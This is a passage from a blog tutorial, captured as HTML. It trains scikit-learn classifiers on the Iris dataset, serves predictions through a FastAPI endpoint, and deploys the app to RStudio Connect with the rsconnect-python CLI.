&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Our demo consists of a &lt;code&gt;train.py&lt;/code&gt; script which trains a few machine learning models on the classic Iris dataset and saves the fitted models to &lt;code&gt;.joblib&lt;/code&gt; files. We then have a &lt;code&gt;fastapi_ml.py&lt;/code&gt; script where we build our API. This loads the trained models and uses them to predict the species classification for a given iris data entry.&lt;/p&gt;
&lt;p&gt;First we will need to create the script in which we will train our models:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;touch train.py
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;and then copy in the code below.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# train.py&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;joblib&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;numpy&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;as&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;np&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;from&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;sklearn.datasets&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; load_iris
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;from&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;sklearn.naive_bayes&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; GaussianNB
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;from&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;sklearn.neighbors&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; KNeighborsClassifier
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;from&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;sklearn.svm&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; SVC
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Load in the iris dataset&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;dataset &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; load_iris()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Get features and targets for training&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;features &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; dataset&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;data
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;targets &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; dataset&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;target
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Define a dictionary of models to train&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;classifiers &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;GaussianNB&amp;#34;&lt;/span&gt;: GaussianNB(),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;KNN&amp;#34;&lt;/span&gt;: KNeighborsClassifier(&lt;span style="color:#a5d6ff"&gt;3&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;SVM&amp;#34;&lt;/span&gt;: SVC(gamma&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;, C&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Fit models&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;for&lt;/span&gt; model, clf &lt;span style="color:#ff7b72;font-weight:bold"&gt;in&lt;/span&gt; classifiers&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;items():
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; clf&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;fit(features, targets)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;with&lt;/span&gt; open(&lt;span style="color:#79c0ff"&gt;f&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;{&lt;/span&gt;model&lt;span style="color:#a5d6ff"&gt;}&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;_model.joblib&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;wb&amp;#34;&lt;/span&gt;) &lt;span style="color:#ff7b72"&gt;as&lt;/span&gt; file:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; joblib&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;dump(clf, file)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Save target names&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;with&lt;/span&gt; open(&lt;span style="color:#a5d6ff"&gt;&amp;#34;target_names.txt&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;wb&amp;#34;&lt;/span&gt;) &lt;span style="color:#ff7b72"&gt;as&lt;/span&gt; file:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; np&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;savetxt(file, dataset&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;target_names, fmt&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;%s&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;We will then need to run this script with:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;python train.py
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;You should now see a &lt;code&gt;target_names.txt&lt;/code&gt; file in your working directory. Along with the &lt;code&gt;&amp;lt;model name&amp;gt;_model.joblib&lt;/code&gt; files.&lt;/p&gt;
&lt;p&gt;Next we will create a file for our FastAPI app,&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;touch fastapi_ml.py
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;and copy in the following code to build our API.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# fastapi_ml.py&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;from&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;enum&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; Enum
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;joblib&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;numpy&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;as&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;np&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;from&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;fastapi&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; FastAPI
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;from&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;pydantic&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; BaseModel
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;from&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;sklearn.datasets&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; load_iris
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;from&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;sklearn.naive_bayes&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; GaussianNB
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;from&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;sklearn.neighbors&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; KNeighborsClassifier
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;from&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;sklearn.svm&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; SVC
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Create an Enum class with class attributes with fixed values.&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;class&lt;/span&gt; &lt;span style="color:#f0883e;font-weight:bold"&gt;ModelName&lt;/span&gt;(str, Enum):
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; gaussian_nb &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;GaussianNB&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; knn &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;KNN&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; svm &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;SVM&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Create a request body with pydantic&amp;#39;s BaseModel&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;class&lt;/span&gt; &lt;span style="color:#f0883e;font-weight:bold"&gt;IrisData&lt;/span&gt;(BaseModel):
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; sepal_length: float
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; sepal_width: float
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; petal_length: float
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; petal_width: float
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Load target names&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;with&lt;/span&gt; open(&lt;span style="color:#a5d6ff"&gt;&amp;#34;target_names.txt&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;rb&amp;#34;&lt;/span&gt;) &lt;span style="color:#ff7b72"&gt;as&lt;/span&gt; file:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; target_names &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; np&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;loadtxt(file, dtype&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;str&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Load models&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;classifiers &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; {}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;for&lt;/span&gt; model &lt;span style="color:#ff7b72;font-weight:bold"&gt;in&lt;/span&gt; ModelName:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;with&lt;/span&gt; open(&lt;span style="color:#79c0ff"&gt;f&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;{&lt;/span&gt;model&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;value&lt;span style="color:#a5d6ff"&gt;}&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;_model.joblib&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;rb&amp;#34;&lt;/span&gt;) &lt;span style="color:#ff7b72"&gt;as&lt;/span&gt; file:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; classifiers[model&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;value] &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; joblib&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;load(file)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Create a FastAPI instance&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;app &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; FastAPI()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Create a POST endpoint to receive data and return the model prediction&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;@app.post&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;/predict/&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;{model_name}&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;async&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;def&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;predict_model&lt;/span&gt;(data: IrisData, model_name: ModelName):
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; clf &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; classifiers[model_name&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;value]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; test_data &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; [
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; [data&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;sepal_length, data&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;sepal_width, data&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;petal_length, data&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;petal_width]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; class_idx &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; clf&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;predict(test_data)[&lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;] &lt;span style="color:#8b949e;font-style:italic"&gt;# predict model on data&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;return&lt;/span&gt; {&lt;span style="color:#a5d6ff"&gt;&amp;#34;species&amp;#34;&lt;/span&gt;: target_names[class_idx]}
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;We can run the server locally with,&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;uvicorn fastapi_ml:app --reload
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Now if you go to &lt;a href="http://127.0.0.1:8000/docs" rel="external"&gt;http://127.0.0.1:8000/docs&lt;/a&gt;, you should see a page that looks like this,&lt;/p&gt;
&lt;p&gt;&lt;img alt="ML API documentation homepage" height="auto" id="h-rh-i-0" src="https://www.jumpingrivers.com/blog/python-api-deployment-with-rstudio-connect-fastapi/api-doc.png" width="1846"&gt;&lt;/p&gt;
&lt;p&gt;You can test out your API by selecting the &amp;lsquo;POST&amp;rsquo; dropdown and then clicking &amp;lsquo;Try it out&amp;rsquo;.&lt;/p&gt;
&lt;p&gt;You can also test the response of your API for the KNN model with,&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -X &lt;span style="color:#a5d6ff"&gt;&amp;#39;POST&amp;#39;&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;http://127.0.0.1:8000/predict/KNN&amp;#39;&lt;/span&gt; -H &lt;span style="color:#a5d6ff"&gt;&amp;#39;accept: application/json&amp;#39;&lt;/span&gt; -H &lt;span style="color:#a5d6ff"&gt;&amp;#39;Content-Type: application/json&amp;#39;&lt;/span&gt; -d &lt;span style="color:#a5d6ff"&gt;&amp;#39;{&amp;#34;sepal_length&amp;#34;: 0,&amp;#34;sepal_width&amp;#34;: 0,&amp;#34;petal_length&amp;#34;: 0,&amp;#34;petal_width&amp;#34;: 0}&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;You can get the response for the other models by replacing &amp;lsquo;KNN&amp;rsquo; with their names in the path.&lt;/p&gt;
&lt;h3 id="deploying-to-rstudio-connect"&gt;Deploying to RStudio Connect&lt;/h3&gt;
&lt;p&gt;Deploying a FastAPI app to RStudio Connect is very similar to deploying a Flask app. First of all, we need to install &lt;code&gt;rsconnect-python&lt;/code&gt;, which is the CLI tool we will use to deploy.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;pip install rsconnect-python
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;If you have not done so already, you will need to add the server that you wish to deploy to. The first step is to create an API key. Log into RStudio Connect and click on your user icon in the top left corner, navigate to &amp;ldquo;API Keys&amp;rdquo; and add a new API key.&lt;/p&gt;
&lt;p&gt;&lt;img alt="user menu icon" height="auto" id="h-rh-i-1" src="https://www.jumpingrivers.com/blog/python-api-deployment-with-rstudio-connect-fastapi/menu.png" width="1003"&gt;&lt;/p&gt;
&lt;p&gt;Remember to save the API key somewhere as it will only be shown to you once!&lt;/p&gt;
&lt;p&gt;It is also useful to set an API key environment variable in our &lt;code&gt;.env&lt;/code&gt; file. This can be done by running&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;echo &lt;span style="color:#a5d6ff"&gt;&amp;#39;export CONNECT_API_KEY=&amp;lt;your_api_key&amp;gt;&amp;#39;&lt;/span&gt; &amp;gt;&amp;gt; .env
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;source .env
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;If you wish you could also add an environment variable for the server you are using,&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#79c0ff"&gt;CONNECT_SERVER&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&amp;lt;your server url&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Note the server url will be the part of the url that comes before &lt;code&gt;connect/&lt;/code&gt; and must include a trailing slash.&lt;/p&gt;
&lt;p&gt;Now we can add the server with,&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;rsconnect add --server &lt;span style="color:#79c0ff"&gt;$CONNECT_SERVER&lt;/span&gt; --name &amp;lt;server nickname&amp;gt; --api-key &lt;span style="color:#79c0ff"&gt;$CONNECT_API_KEY&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;You can check the server has been added and view its details with&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;rsconnect list
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Before we deploy our app, there is one more thing to watch out for. Unless you have a &lt;code&gt;requirements.txt&lt;/code&gt; file in the same directory as your app, RStudio Connect will freeze your current environment. Therefore, make sure you run the deploy command from the virtual environment which you created your FastAPI app in and wish it to run in on the server.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Aside&lt;/strong&gt; When writing this blog I found there is a bug in pip/ubuntu which adds &lt;code&gt;pkg-resources==0.0.0&lt;/code&gt; when freezing the environment. This causes an error when trying to deploy. To get around this you can create a &lt;code&gt;requirements.txt&lt;/code&gt; file for your current environment and exclude &lt;code&gt;pkg-resources==0.0.0&lt;/code&gt; with&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;pip freeze | grep -v &lt;span style="color:#a5d6ff"&gt;&amp;#34;pkg-resources&amp;#34;&lt;/span&gt; &amp;gt; requirements.txt
